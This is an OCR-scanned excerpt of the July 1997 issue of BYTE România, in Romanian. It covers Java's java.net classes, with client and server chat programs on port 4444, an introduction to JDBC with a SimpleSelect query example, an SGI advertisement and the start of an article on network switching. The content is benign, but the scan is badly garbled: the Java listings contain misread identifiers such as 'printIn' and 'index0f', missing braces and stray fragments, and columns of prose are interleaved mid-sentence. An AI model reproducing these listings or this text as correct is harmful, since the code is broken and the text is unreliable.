caţie efectivă, cele două calculatoare trebuie să comunice pe același
port. În aplicaţia care urmează, portul comun este setat din pro-
gram (4444), dar poate fi schimbat de către programator.
În continuare vom prezenta câteva subclase din pachetul java.net
pentru facilitarea lucrului cu metodele ce implementează conceptele
de rețea.
Clasa java.net.URLConnection
Această clasă este concepută pentru a reprezenta o conexiune activă
spre un obiect definit de URL. Prin facilităţile oferite de această clasă
se câştigă un control sporit asupra salvării (download) conţinuturilor
URL. Metodele cele mai utilizate definite în această clasă sunt:
* public abstract void connect() throws IOException - Obiectele
URI Connection parcurg 2 faze: în prima fază ele sunt create, apoi
sunt conectate.După ce au fost create, şi înainte de a fi conectate,
diferite opţiuni pot fi specificate (de exemplu, dolnput, UseCaches)
* public URL getURL() - Întoarce URL pentru conexiunea curentă.
* public int getContentLength() - Întoarce lungimea conţinutului.
Dacă aceasta este necunoscută rezultatul va fi -1.
* public String getContentType() - Întoarce tipul conţinutului.
Dacă acesta este necunoscut rezultatul va fi nul.
* public long getExpiration() - Întoarce data de expirare a unui
obiect. Dacă aceasta nu este cunoscută, rezultatul este 0.
* public long getLastModified() - Metoda întoarce data ultimei
modificări pentru obiectul dat. Dacă aceasta dată nu este cunos-
cută, rezultatul este 0.
* public Object getContent() throws IOException - Metoda în-
toarce obiectul referit de URL. De exemplu , dacă URL referă o
imagine, obiectul va fi o instanţiere a clasei Image.Dacă proto-
colul nu oferă suport pentru conţinut, apare o eroare de tip Un-
knownServiceException.
* public String toString() - Intoarce reprezentarea sub forma de şir
de caractere a conexiunii URL.
* public void serDolnput(boolean doinput) - conexiune URL-poate
fi utilizată pentru input şi/sau output. Se va seta flagul Dolnput la
valoarea true, dacă se intentionează utilizarea conexiunii URL
pentru output, şi la valoarea false altfel. Valoarea implicită este
false.
WWW.ACOTa,
Clasa java.net.ServerSocket
O clasă interesantă prin posibilităţile pe care le oferă programatorilor
este clasa java.net.ServerSocket Aceasta clasă implementează opera-
ţiile legate de starea de server a socketului. Fără ea nu s-ar putea scrie
aplicaţii de tip client/server în Java.Constructorii acestei clase sunt:
* public ServerSocket(int port) throws IOException - Creează un
serversocket pe portul specificat. În cazul apariţiei unei erori la
deschiderea socketului este captată excepţia IOException.
* public ServerSocket(int port, int count)throws IOException -
Creează un serversocket pe un port dat cu un timp maxim de
ascultare. Se poate conecta pe portul 0 ca anonymous.
Dintre metodele acestei clase amintim pe cele mai importante:
* public InetAddtress getlnetAddress() - Întoarce adresa la care
socketul este conectat.
* public int getLocalPort() - Întoarce portul pe care ascultă socketul.
* public Socket accept() throws IOException - Accepta 0 conexi-
une. Această metodă va bloca sistemul până când conexiunea va
fi realizată efectiv.
* public void close() throws IOException - Sistemul închide ser-
ver socketul. Dacă apare o eroare în timpul închiderii socketu-
lui, atunci este captată exceptia IOException.
Exemplu:
Aplicația următoare este compusă din 2 programe : un server care
asteaptă să fie chemat (ascultă permanent pe un socket) și un client
care face o cerere de conectare la socketul la care aşteaptă serverul.
O aplicaţie mai complexă, care permite, de exemplu, conectarea
mai multor clienţi la un server (obținând astfel un chat) nu poate
ocoli multithreating-ul. Aplicația prezentată este o aplicaţie inde-
pendentă (nu funcţionează în interiorul unei pagini Web). Am ales
această cale deoarece cele mai multe exemple de programe Java sunt
applet-uri, neglijându-se astfel importanţa programelor indepen-
dente. După cunoştinţele mele în acest domeniu, limbajul Java este
la fel de puternic ca și limbajul de inspiraţie C+ + având în plus avan-
tajele unei standardizări, a independenţei de maşina pe care rulează
(reamintim ca în spatele programelor rulează o mașină virtuală Java)
şi a unei simplificări (nu mai cade în sarcina programatorului
gestiunea memoriei şi lucrul cu pointeri). Aplicația poate fi trans-
formată cu uşurinţă în applet folosindu-se clasa AW'T pentru pre-
luarea mesajelor de la tastatura (TextArea) şi suprascriind metodele
clasei java.applet.Applet
Pentru un real program de comunicaţie este necesară existența
unui server care să asculte permanent un socket predefinit și a unui
client care să solicite serverului conectarea la socketul respectiv. Se
observă că numărul socketului trebuie cunoscut de client . Acesta
va fi o variabilă finală (echivalentul unei declaraţii constante în alte
limbaje de programare) în ambele programe.
Preluarea răspunsului de la tastatură va fi realizată de o clasă getan-
swer . În această clasă răspunsul va fi memorat în Stringul Sanswer .
Tot această clasă va face verificarea dacă în răspunsul primit apare
sau nu cuvântul cheie bye care va determina ruperea legăturii însoțită
de un mesaj de avertizare primit de partener. Această facilitate fun-
cţionează chiar dacă apar spaţii înainte sau după cuvântul cheie bye.
Cei doi parteneri de discutii vor comunica pe portul 4444. Acestă
poate fi schimbat de programator, cu observaţia că trebuie să fie ace-
laşi atât în programul server, cât şi în programul client. Serverul va
JULIE 1997 BYTE Romania 107
Internet
Clasele java.net.*
import java.io.*;
import java.net.*;
import java.util.*;
// aceasta clasa preia raspunsurile de
la tastatura
class getanswer{
StringBuffer answer=new String-
Buffer(30);
String Sanswer=new String();
public getanswer(StringBuffer
answer) {
this.answer=answer;
}
public void getAnswer() {
StringBuffer an=new String-
Buf fer(30);
char c='>';
while(c!="\n'){
try{c=(char)System.in.read()
catch( IOException e) {
System.out.print-
InC"ERROR: 1/0 error");
System.exit(-1);
an.append(c);
answer.append(an.toString()+
30)
Sanswer=an.toString();
ef
public void flushAnswer() {
this.answer.setLength(0);
}
boolean OKbye(String bye) {
if ((Sanswer. index0f(bye)==San-
swer. lastIndex0f (bye) )&&(San
swer.index0f (bye) !=-1))
return true;
else return false;
}
// clasa principala ce implementeaza
comportarea clientului
class tclient extends Thread{
int port;
public tclient(int port) {
this.port=port;
Codul sursa al aplicatiei client
)
// inima threadului
public void run(){
try{
DataInputStream dis;
DataOutputStream dat;
// clientul citeste adresa serveru-
lui la care doreste conectarea
StringBuffer d=new String-
Buffer(30);
d.append("");
getanswer aa=new getanswer(d);
System. out.printIn("type the serv-
er address: ");
aa.getAnswer();
aa.answer.setLength(aa.answe
r.length()-2);
//comunicatia este stabilita
Socket socket=new
Socket(aa.answer.toString(),
4444);
aa.flushAnswer();
// aplicatia primeste mesaj de con-
firmare din partea serveru-
lui pentru
// inceperea transmiterii de mesaje
di s=new DataInputStream(socket.get-
InputStream());
String ear=new String();
ear=dis.readLine();
if(ear.index0f ("OK") !=-1){}
else{
// serverul a refuzat acceptarea talk-
ului
System.out.printIn("The server is
refusing the connection");
socket.close();
System.exit(-1);
// daca serverul accepta legatura atun-
ci utilizatorul client este
anuntat
String adresa=socket.getInetAd-
dress().toString();
System. out.printIn("").
dat=new DataQutputStream(sock-
et.getOutputStream());
String fromServer=new String();
boolean comunic=true;
while(comunic) {
System.out.printIn(""): :
aa.flushAnswer();
}
else{
aa.flushAnswer();
fromServer=dis.readLine();
System.out.printin(""+fromServer);
if((fromServer.index-
Of ("bye" )==fromServer.lastIn
dex0f ("bye") )&&( fromServ-
er.index0f("bye")!=-1))
{
comunic=false;
System. out.println("");
}
}//else if
}// while(comunic)
socket.close();
}//try
catch( IOException e) {
System.out.printIn("");
System.exit(-1);
}
System.exit(-1);
)// run
}
public class clientThread{
public static void main(String
args[]){
int port=4444;
tclient TC=new tclient(port);
Esstart@:
aştepta conectarea unui client într-o buclă
infinită wbhile(true) . Pentru a evita o nouă
buclă de aşteptare am folosit facilitatea in-
structiunii socket=servsosket.accept(); dea
bloca sistemul pana cand aceasta va fi exe-
cutată. Odată legatura stabilită, serverul va
lua cunoştinţă de identitatea clientului prin
aflarea adresei de IP, iar dacă ceva nu-i place
la interlocutor poate refuza „convorbirea“.
Această întrerupere se va face politicos prin
anunțarea clientului ca serverul a rupt legătu-
ra. Dacă însă comunicarea este acceptată, ser-
verul trimite un mesaj de confirmare progra-
mului client permiţând acestuia iniţierea
schimbului de mesaje. Acest schimb de me-
saje va fi efectuat până când serverul introdu-
ce „bye“ sau până când serverul primeşte un
„bye“ cazuri în care legătura este întreruptă.
108 BYTE România IULIE 1997
Considerații finale
Prin clasele java.net.* puse la dispoziţie de
mediul Java, un programator depașește ca-
drul restrâns al propriului computer, înce-
pând interacţiunea cu exteriorul. Limbajul
Java este dedicat Internetului. O aplicație
Java care functionează doar pentru efecte
vizuale interesante ce apar pe pagina vreunui
navigator, este fără îndoială o aplicaţie utilă,
dar nu foloseşte toată puterea acestui limbaj.
Aventura începe acolo unde mai multe com-
putere legate într-o rețea (poate fi si un Intra-
net) încep să colaboreze, să schimbe infor-
mafii, să înveţe unele de la altele. Până acum
acest domeniu era dezvoltat prin C, astăzi,
prin independenţa de platformă, prin usu-
rința programării, Java preia cu succes toate
sarcinile „C“-ului atrăgând un număr din ce
în ce mai mare de programatori. Punctul slab
al limbajului, viteza redusă de rulare a maşi-
nii virtuale Java, este pe cale de a fi înlaturat
prin crearea de cipuri speciale Java. Conclu-
zionând putem spune că, deși la noi în ţară,
din cauza lipsei infrastructurii informatice ,
limbajul Java pătrunde şi se dezvoltă mai
greu, programatorii care îndrăgesc acest lim-
baj au toate motivele să fie optimişti,
deoarece marile firme soft (Sun, Microsoft,
Oracle, IBM, s.a.) susţin acest limbaj. BI
Pelin Nicoleta-Corina și Pelin Cristian-Floren-
tin sunt cercetători la Institutul pentru Tehnica
de Calcul Bucuresti si pot fi contactaţi la adrese-
le de e-mail: nicoleta@itcgate.itc.ro si cristi@itc-
gate.itc.ro
Clasele java.net.*
Internet
Codul sursă al aplicaţiei server
import java.net.*;
import java.util.*;
import java.io0.*;
// aceasta clasa preia introducerile
de la tastatura
class getanswer{
StringBuffer answer=new String-
Buf fer(30);
String Sanswer=new String();
public getanswer(StringBuffer
answer) {
this.answer=answer ;
}
public void getAnswer() {
StringBuffer an=new
Buffer(30);
Cha: 3
while(c!="\n' ){
try{c=(char)System.in.read();}
catch( IOException e){
~ System.out.printiln("");
System.exit(-1);
SEring=
}
an.append(c);
answer.append(an.toString()+
ENOLOe
Sanswer=an.toString();
}
public void flushAnswer() {
this.answer.setLength(0);
)
boolean OKbye(String bye)!
if((Sanswer. index0f(bye)==Sanswer.las
tIndexOf (bye) )&&(Sanswer.ind
ex0f (bye) !=-1))
return true;
else return false;
}
}
// clasa principala ce implementeaza
comportamentul serverului
class tserver extends Thread!
public Socket socket;
public int port=4444;
public int timeoutsecs=6000;
private ServerSocket servsocket;
// constructorul clasei prin care pot
fi setati parametrii serveru-
lui
// (timpul de stingere al serverului
„daca nu a fost conectat, por-
tul de comunicare,
// socket-ul pe care are loc comuni -
carea)
public tserver(int timeoutsecs, int
port, Socket socket)
{
try{
servsocket =new
ServerSocket(port, timeout -
secs);}
catch( IOException e){
System.out.printIn("");
System.exit(-1);
}
this.timeoutsecs=timeoutsecs;
this.port=port;
this.socket=socket;
}
public tserver(int timeoutsecs, int
port)
{
try{
servsocket =new
ServerSocket (port, timeout -
secs) ;}
catch( IOException e){
System. out.printIn("");
System.exit(-1);
}
this.timeoutsecs=timeoutsecs;
this.port=port;
}
// inima thread-ului, metoda care par-
ticularizeaza functionarea
firului de executie
// conform propriei noastre dorinte
public void run()
{
RA
while (true) {
// pentru a oferi putina atractivi-
tate, sistemul afiseaza tim-
pul local la care serverul
// a fost pornit
Date timp=new Date();
System.out.printIn( "Welcome
back! Local time is: "+timp);
String local=new String();
StringBuffer d=new String-
Buffer(30);
d.append(" ");
boolean accept=false;
while(!accept){
System.out.printIn("");
getanswer ac=new getanswer(d);
ac.getAnswer();
if (ac.OKbye("yes")) |
// daca utilizatorul care ruleaza
serverul accepta legatura
atunci aplicatia server
// trimite o confirmare aplicatiei
client prin care aceasta este
autorizata sa inceapa
// sa comunice
DataOutputStream ack=new
DataOutputStream(socket.getO
utputStream()) ;
ack.writeBytes("OK"+"\n");
accept=true;
}
else{
// daca utilizatorul nu accepta legatu-
ra atunci se trimite apli-
catiei client un mesaj de
refuz
DataOutputStream ack=new DataOut -
putStream(socket.getOutput- _
Stream());
ack.writeBytes("NO"+"\n");
}
)// mhile(accept)
// daca legatura a fost initiata uti-
lizatorul server poate
cunoaste adresa clientului
// cu care schimba mesaje
getanswer aa=new getanswer(d);
System.out.printIn(""treply);
// se verifica daca mesajul clientului
contine cuvantul cheie bye
if((reply.indexOf("bye" )==reply.lastl
ndexOf ("bye") )&&( reply. index
Of ("bye") !=-1)){
comunic=false;
System. out.printIn("");
}
else{
System.out.printin("" ) ;
System.exit(-1);
}
}
}
public class serverThread |
// aplicatia este de tipul standallone,
deci se va lansa din linia de
comanda
public static void main(String aL])
throws IOException{
tserver TS=new tserver(6000,4444) ;
TSestart® >
JULIE 1997 BYTE Romania 109
Noua denumire a societății SIROM GRAPHICS COMPUTERS S.A. este:
Sir. Av. Radu Beller, nr. 25,
M A iy / C sector 1, 71251 Bucuresti
Systems S.A. Tel: 230.04.78 Fax: 230.04.79
n e-mail: sgi@sirom.emat.sgi.com
Sie SiliconGraphics URL: http://sirom.kappa.ro
7 Computer Systems _... Authorised Distributor
ERA
Napoleon pentru ea...
Vlad Tepes pentru ea...
Dumneavoastră puteţi
FIII PEPTIDE 02
2 GB Ultra SCSI System Dis!
17” Monitor, 1280x1024
100BaseTX / 10BaseT Ethernet
CD-ROM
IRIX 6.3 - UNIX Operating System
Atât de multă față de un biet PC!
Soluţii complete pentru:
Proiectare asistată, inginerie asistată
World Wide Web authoring & serving |
a scale Computer Graphics
Bi psp Opes «Fon Sead Fie We Orn eer je
GIS, Desktop Publishing, Baze de Date (Oracle / Informix), Modelare Moleculară
Java şi baze de date
JDBC - o interfaţă standard la baze de date.
uvântul de ordine al zilelor noas-
tre în informatică este, fără
îndoială, “Java”. Despre baze
de date s-a scris mult și se vor mai
scrie încă multe. Atât Java, cât și bazele de date
sunt domenii importante ale informaticii. În
acest articol încercăm să arătăm cum am putea
să combinăm Java și bazele de date.
JDBC (Java DataBase Connectivity) este
ointerfaţă standard SQL de acces la baze de
date. Acesta ne furnizează un accesuniform
la baze de date relationale. JDBC este con-
stituit dintr-un set de clase si interfete scrise
în Java, furnizând un API standard pentru
proiectanți de aplicaţii baze de date. Acest
lucru face posibilă scrierea aplicaţiilor de
baze de date folosind un API Java pur.
Folosind JDBC este ușor să transmitem
secvenţe SQL către baze de date relationale.
Cu alte cuvinte, nu este necesar să scriem
un program pentru a accesa o bază de date
Oracle, alt program pentru a accesa o bază
de date Sybase si asa mai departe. Este de
ajuns să scriem un singur program folosind
API-ul JDBC şi acesta va fi capabil să trimită
secvențe SQL bazei de date dorite. Bineînţe-
les, scriind codul sursă în Java, ne este asi-
gurată portabilitatea programului. Deci, iată
două motive puternice care fac combinaţia
Java - JDBC demnă de luat în seamă. Scrii
un program o dată și acesta rulează peste tot.
Fiind robust, sigur, uşor de folosit, ușor
de înțeles, Java este un excelent limbaj pen-
tru a dezvolta aplicații de baze de date. Tot
ceea ce-i lipseşte este modalitatea prin care
aplicaţiile Java pot comunica cu bazele de
date. Aici vine însă JDBC-ul care oferă acest
mecanism. =
Ce face JDBC-ul? În linii mari JDBC face
trei lucruri:
* stabileşte o conexiune cu o bază de date;
* trimite secvenţe SQL;
* prelucrează rezultatele.
Nivel jos și nivel înalt
JDBC-ul este o interfaţă “low-level”, adică
este folosit pentru a executa direct comen-
zi SQL. El lucrează foarte bine în această
postură și este mai ușor de folosit decât alte
API-uri pentru conexiunea bazelor de
date, dar totodată a fost proiectat astfel încât
să fie baza pe care să poţi construi interfeţe
şi unelte de nivel mai ridicat. Până la ora
actuală există două tipuri mai importante
de API-uri JDBC:
1.Un preprocesor SQL incapsulat pentru
De Pito Peter si Stelian Vultur
Java. SGBD-urile relationale imple-
mentează SQL, un limbaj specific folosit
cu bazele de date. JDBC necesită ca
secvențele SQL să fie trimise metodelor
Java sub formă de șiruri de caractere. Un
preprocesor SQL încapsulat permite
folosirea secvențelor mixte SQL direct din
Java. De exemplu, o variabilă Java poate
fi folosită într-o secvență SQL pentrua pri-
mi sau furniza valori SQL. Preprocesorul
Modelul cu
“Maine ellent.
aa
Serverul e :
de bares de date
Mavina elient *
(eat)
ri NTIP,e
„său CORBA
Maeina client
Protoced specific:
50B0-alu
Serverul «
de baze de date
Java încapsulat transformă apoi această
mixtură Java/SQL în apeluri JDBC.
2. O mapare directăa tabelelor bazei de date
relationale în clase Java. În această mapa-
re, fiecare articolal tabelei devine o instan-
ță aunei clase şi fiecare câmp corespunde
unui atribut al instanţei respective. În acest
fel se poate opera direct cu obiecte Java.
JDBC si ODBC
În acest moment, ODBC-ul Microsoft-ului
este probabil cea mai folosită interfață pen-
tru a accesa baze de date relaționale, oferind
posibilitatea dea utiliza aproape orice fel de
bază de date, de pe aproape orice platfor-
mă. Întrebarea care apare imediat: de ce nu
utilizăm pur şi simplu ODBC din Java?
Răspunsul este că se poate folosi ODBC în
Java, dar cel mai bine este să utilizăm JDBC
sub forma combinației JDBC-ODBC, care
va fi implementată în scurt timp. O altă
întrebare apare: de ce avem nevoie de
JDBC? Iată câteva răspunsuri:
1. ODBC nu este potrivit pentru a fi uti-
lizat direct din Java pentru că foloseşte o
interfață C, iar apelurile din Java către
codul nativ C pot provoca unele pro-
bleme, ca de exemplu cele legate de porta-
bilitate și securitate.
2. O transpunere literală a codului sursă C
al ODBC-ului în Java nu este de dorit pen-
tru că, de exemplu, Java nu are pointeri,
în timp ce sursa ODBC-ului se foloseşte
foarte mult de ei, inclusiv de cunoscutul
pointer “void *”. Însă JDBC-ul poate fi
văzut ca o traducere a ODBC-ului într-o
interfață orientată obiect.
3. ODBC este mai greu de învăţat, deoarece
amestecă laolaltă construcţiile simple cu
cele avansate şi are opţiuni complexe
chiar şi pentru interogări simple. În
schimb, JDBC-ul a fost proiectat astfel
încât să nu complice lucrurile simple, dar
să ofere şi tehnici avansate acolo unde este
nevoie de ele.
4. Folosirea JDBC-ului oferă o soluţie pură
Java. Codul este în acest caz portabil și ofe-
ră securitate pe toate platformele, de la
calculatoarele de rețea la mainframe-uri.
Deci JDBC-ul este o interfață Java natu-
rală către facilitățile de bază din SQL. Însă
JDBC-ul se bazează pe ODBC, astfel că pro-
gramatorii familiarizați cu ODBC vor găsi
învățarea JDBC-ului foarte ușoară.
Două sau trei niveluri
În modelul cu două niveluri (fmo-tier), un
aplet sau o aplicaţie Java lucrează direct cu
baza de date. În acest caz este necesar un dri-
ver JDBC care comunică cu SGBD-ul par-
ticular al bazei respective. Cererea SQL este
trimisă bazei de date iar rezultatul este
înapoiat utilizatorului, baza de date putân-
du-se afla pe altă mașină la care utilizatorul
este conectat printr-o rețea. Acest model este
similar modelului client/server (vezi figura
Modelul cu două niveluri).
În modelul cu trei niveluri (three-tier),
interogările se trimit către un nivel inter-
mediar (numit și server de aplicaţie), care
retrimite cererea SQL către serverul bazei de
IULIE 1997 BYTE România 111
Administrarea datelor
date. Acesta o prelucrează și trimite rezul-
tatul către nivelul de mijloc, care îl transmite
mai departe către utilizator. În acest caz, uti-
lizatorul poate utiliza un API de nivel înalt,
mai simplu de folosit, care transpune cererile
într-un nivel mai jos, înțeles de serverul bazei
de date (vezi figura Modelul cu trei niveluri).
Până acum nivelul de mijloc era scris în
general în C sau C+ +, limbaje care oferă
performanţe ridicate. Oricum, cu compila-
toarele care traduc codul Java în cod spe-
cific mașinii, a devenit practic să se imple-
menteze modelul cu trei nivele în Java.
Acesta este un atu important, deoarece prof-
ită de calitățile Java în ceea ce priveşte
robustetea și securitatea.
Concordanta SQL
SQL-ul este un limbaj standard pentru acce-
sarea bazelor de date relationale. Aproape
toate SGBD-urile folosesc pentru functiona-
litatea de bază o formă de SQL, însă există
diferenţe de la un SGBD la altul în ceea ce
priveşte alinierea dialectului SQL specific la
standardul limbajului, mai ales pentru facil-
*
Java si baze de date
itagile mai avansate. Pand ce aceste probleme
se vor rezolva, API-ul JDBC trebuie să
suporte SQL-ul asa cum este.
Să vedem însă cum se descurcă JDBC-ul
cu aceasta problema a concordantei SQL.
O modalitate pe care API-ul JDBC ne-o o-
feră este că ne permite să trimitem orice sec-
venta SQL unui anumit SGBD. Prin aceasta
suntem liberi să folosim la maxim posibilită-
tile SQL-ului, dar exist riscul ca SGBD-ul să
nu înțeleagă sintaxa şi să returneze eroare.
O a doua posibilitate pe care JDBC-ul o
oferă este de a folosi așa-numitele “clauze
escape”, în stilul clauzelor escape ODBC.
Această metodă rezolvă o parte din diver-
genţele datorate implementării SQL-ului.
Atreia posibilitate este recomandată pen-
tru aplicaţii complexe. JDBC-ul furnizează
informaţii despre SGBD prin interfaţa
DatabaseMetaData, astfel încât aplicaţiile
se pot adapta în funcţie de necesitățile și
posibilităţile fiecărui SGBD.
Produse JDBC
Să vedem acum câteva produse JDBC. Java-
Soft furnizează JDBC-ul cu trei compo-
nente, toate incluse in JDK:
¢ JDBC driver manager;
¢ JDBC driver test;
* JDBC-ODBC bridge
JDBC driver manager este coloana verte-
brală a arhitecturii JDBC. Este destul de
mic și simplu; funcția de bază este de a conec-
ta aplicaţia Java cu driverul JDBC potrivit.
JDBC driver test ne încredințează că driverul:
JDBC va rula programul nostru. În fine,
combinaţia JDBC-ODBC permite driverelor
ODBC să fie folosite ca drivere JDBC.
Practica...
În exemplul din caseta alăturată este prezen-
tatun program Java care realizează o conex-
iune la un driver JDBC, căruia i se furnizează
o secvenţă select şi se afişează rezultatul (în
acest caz, toate articolele tabelei). BI
Pito Peter și Stelian Vultur sunt studenţi la Uni-
versitatea Petru Maior din Târgu-Mureş şi pot
fi contactaţi la adresele ppitoQagora.ro și
svultur@uttgm.ro.
import java.net.URL;
import java.sql.*;
class SimpleSelect {
public static void main (String args[]){
String url = "jdbc:odbc:my-dsn";
String query = "SELECT * FROM
myTable";
try {
// încărcarea driverului de legă-
// turd jdbc-odbc
Driver");
DriverManager.setLogStream(Sys
tem.out);
// încercare de conectare la un
// driver
Connection con = DriverManager.getCon
nection (url, "my-user", "my-
passwd");
// afisarea unor informatii despre
// conexiune
DatabaseMetaData dma = con.getMetaData
Gs
System. out.printIn("\nConnected
to " + dma.getURL()):
System.out.printin("Driver
+ dma.getDriverName());
Class.forName ("sun. jdbc.odbc.JdbcOdbc'
Un exemplu
System.out.printiIn("Version
+ dma.getDriverVersion());
System.out.printin("");
// creare secvente SQL
Statement stmt = con.createState
ment ();
ResultSet rs = stmt.executeQuery
(query);
dispResultSet (rs);
rs.close();
stmt.close();
con.close();
}
catch (SQLException ex) {
System.out.printIn ("\n*** SQLExcep
E One Sen):
while (ex != null) |
System.out.println ("SQLState:
+ ex.getSQLState ());
System.out.printIn ("Message: "+
ex.getMessage ());
System.out.printin ("Vendor: "+
ex.getErrorCode ());
ex = ex.getNextException ();
System.out.printin ("");
}
)
catch (java.lang.Exception ex) |
ex.printStackTrace ();
}
// metoda dispResultSet afiseaza toate
// articolele unui obiect ResultSet
private static void dispResultSet
(ResultSet rs)
throws SQLException {
TAL es
ResultSetMetaData rsmd = rs.getMeta
Data (); :
int numCols = rsmd.getColumnCount ();
for (i=1; i<=numCols; i++) |
if (7 > 1) System.out.print(",");
System.out.print(rsmd. getColumn
Label(i));
}
System.out.printin("");
boolean more = rs.next ();
while (more) {
for (i=l; i<=numCols; i++) {
if (i > 1) System. out.print(",");
System.out.print(rs.get
String(i));
}
System.out.printin("");
more = rs.next ();
)
112 BYTE România IULIE 1997
Fundamente
ale comutării
eţelele de calculatoare repre-
zintă în prezent suportul prin-
cipal pentru realizarea comu-
nicaţiilor în majoritatea orga-
nizatiilor moderne. Evoluţia continuă,
schimbarea practicilor î în afaceri si noile
aplicații forțează î însă limitele tehnologiei
către noi performanţe, grade de flexibili-
tate şi fiabilitate. Astfel, soluţiile viitorului
vor permite disponibilizarea unei lățimi de
bandă mai mari, un trafic multimedia şi o
administrare simplificată a rețelei.
Tehnologia comutaţiei va fi cea care va
aborda noile cerințe, mărind durata de viata
a rețelelor existente în timp ce va permite
apariţia noilor arhitecturi. Ea
De Daniel Moldovan
punți, rutere), prosperitatea a generat o creş-
tere a utilizării şi aplicaţii noi, care la rândul
lor au cerut mai mult decât pot furniza arhi-
tecturile actuale. În continuare voi face o tre-
cere în revistă a arhitecturilor de inter-
conectare actuale, după care voi prezenta
noile arhitecturi şi blocuri constructive.
Coloane distribuite
Într-o arhitectură de coloane distribuite,
hub-urile de medii partajate consolidează
cablarea orizontală de pe fiecare palier, în
timp ce coloana LAN realizată cu rutere co-
nectează etajele. Coloana poate folosi acee-
aşi metodă de acces ca și cea folosită de re-
ce există mai multe rutere, căderea unui sin-
gur ruter va afecta doar segmentele LAN
atașate. Pe de altă parte, rutere multiple pot
genera probleme de performanţă şi admi-
nistrare. Clienţii care accesează un server
situat pe un segment diferit vor fi nevoiți să
traverseze două rutere, ceea ce va genera o
întârziere. Pentru că ruterele și serverele
sunt răspândite în toată clădirea, configu-
rarea şi întreţinerea poate fi un mare con-
sumator de timp și bani.
Coloane comprimate
Coloanele comprimate evită deficienta pre-
zentă la coloanele distribuite. Din nou,
hub-urile pentru medii par-
va fi cea care va oferi funcţii de
scalabilitate și flexibilitate nece-
sare pentru interconectarea
rețelelor în secolul următor.
Acest articol se doreşte a fi o
introducere în domeniul inter-
conectării rețelelor prin comu-
tatoare (switched internet-
working) oferind o imagine de
ansamblu asupra modului în ca-
re au evoluat reţelele și asupra
viitorului acestora.
Arhitecturi actuale
de interconectare a
rețelelor
Lucrul în rețea este dominat în
prezent de trei arhitecturi de
Ap aţi n noi
Evoluția interconectării
rețelelor
„Evoluţia tehnologiei a
tajate concentrează cablarea
LAN pe fiecare etaj. Acum
însă, față de-o desfășurare
de rutere pe fiecare etaj,
toate hub-urile se
conectează sau se „com-
primă“ într-un singur ruter
centralizat, oferind un sin-
gur punct de control. În-
târzierea reţelei scade de-
oarece serverele sunt des-
partite de clienți printr-un
singur hop. Costurile sunt
reduse prin eliminarea rute-
relor multiple şi printr-o ex-
ploatare economică.
Adăugarea unui hub mul-
tisegment la coloana com-
primată furnizează un ma-
bază. Astfel, rețelele LAN baza-
te pe coloane distribuite (dis-
tributed backbones) sunt pre-
ferate pentru conexiunile dintre clădiri.
Coloanele comprimate (collapsed back-
bones), grupate în jurul ruterelor de înaltă
performanţă sunt răspândite în interiorul
clădirilor, iar rețelele reticulare hibride și
cele distribuite în stea sunt comune pentru
zonele extinse.
Aceste arhitecturi, asl? in jurul mo-
delului traditional al procesarii bazate pe
LAN, sunt destinate să asigure un transport
eficient pentru aplicaţiile client/server. Dar
la fel ca și în cazul unităţilor de rețea tra-
diţionale (hub-uri pentru medii partajate,
Forţele schimbării.
ţelele LAN de palier (spre exemplu 10
Mbps) sau poate folosi o soluție mult mai
rapidă, cum ar fi 100 Mbps FDDI. Din mo-
ment ce fiecare segment LAN este conside-
rat o subreţea separată, iar pachetele care
traversează segmentele trebuie să traverseze
cel puţin un ruter, serverele sunt răspândite
prin toată rețeaua astfel încât ele se pot atașa
aceloraşi segmente ca și utilizatorii lor pri-
mari, evitând astfel introducerea unor întâr-
zieri din partea ruterelor.
Disponibilitatea reprezintă beneficiul pri-
mar al coloanelor distribuite. Din moment
ximum de flexibilitate și ca-
pacitate de administrare.
Segmentele LAN de pe eta-
je diferite pot fi inglobate intr-o subretea,
eliminând hopul prin ruter. Serverele pot
fi localizate central pentru a simplifica
administrarea fără a face compromisuri
legate de performanţă, iar componentele
redundante şi funcţiile hot-swap din ruter
conferă disponibilitate.
Coloane hibride
În timp ce coloanele comprimate sunt ide-
ale pentru clădiri, în mod uzual ele nu sunt
eficiente pentru conlucrarea între rețele din
mai multe clădiri; chiar şi într-un campus
IULIE 1997 BYTE România 113
Reţele
Fundamente ale comutării
Coloană
Campus
și WAN
Coloane distribuite.
sau o zonă de birouri. Nu este practic să legi
fiecare segment LAN la un sit central. Arhi-
tectura preferată pentru medii cu mai multe
clădiri este coloana hibridă: rutere de înaltă
performanţă în fiecare clădire, interconec-
tate printr-o plasă de mărimea unui campus
sau un backbone LAN.
Coloanele LAN sunt mult mai comune
decât rețelele în plasă, deoarece rețelele
LAN sunt mai'uşor de proiectat şi întrețin-
ut. Deoarece LAN-ul de coloane poate
folosi aceeași metodă de acces ca şi LAN-
urile din clădiri, prea multe surse care ali-
mentează traficul de pe coloană pot bloca
rețeaua. Pentru aceste cazuri, soluțiile de
înaltă viteză ca 100 Mbps FDDI reprezintă
cea mai bună alegere. Arhitectura hibridă
rezultată desfășoară coloane comprimate
în fiecare clădire, interconectate între clădiri
printr-o coloană distribuită bazată pe FDDI.
WAN
Arhitecturile de coloane de mare suprafață
(wide area backbone) sunt conduse exclu-
siv din punct de vedere economic. În timp
ce lățimea de bandă locală este esenţial gra-
tuită odată ce cablarea este făcută, lățimea
de bandă pentru distanţe mari (wide area
bandwidth) trebuie să fie închiriată de un
furnizor de servicii. Ţelul primar al oricărei
proiectări wide area, este să furnizeze conec-
tivitate și performanță rezonabilă la un cost
decent.
Lucrul în rețele de mare suprafață com-
bină în mod uzual o plasă backbone cu mai
multe configurații de acces de tip stea.
Această plasă interconectează rutere de înal-
tă performanţă ale siturilor majore, în timp
114 BYTE Romania IULIE 1997
ce configuraţiile stea concentrează traficul
de la ruterele de acces ale siturile minore.
Liniile închiriate punct-cu-punct sunt cele
mai populare și larg răspândite linii de mare
suprafață; în general, consideraţiile de cost
dictează viteza în benzile înguste de la 56/64
Kbps la 1.5/2.0 Mbps. Apelul digital, ISDN
şi serviciile X.25 publice sunt utilizate de
asemenea, fie ca backup, fie ca linii închiri-
ate sau ca și conexiuni primare între situri.
Indiferent de rețeaua wide area folosită,
ruterele joacă două roluri cruciale. În pati
rând ruterele fac trecerea de la formatele
LAN (cum ar fi Ethernet) la formatele wide
area (cum ar fi Frame Relay). În al doilea
rând, ruterele preîntâmpină apariția aglo-
merărilor conexiunilor wide area - cum ar fi,
spre exemplu, broadcasting la nivel MAC.
Limite ale creșterii
Aşa cum s-a menţionat anterior, numărul
de utilizatori în continuă creştere, calcula-
toarele desktop mai puternice şi noile apli-
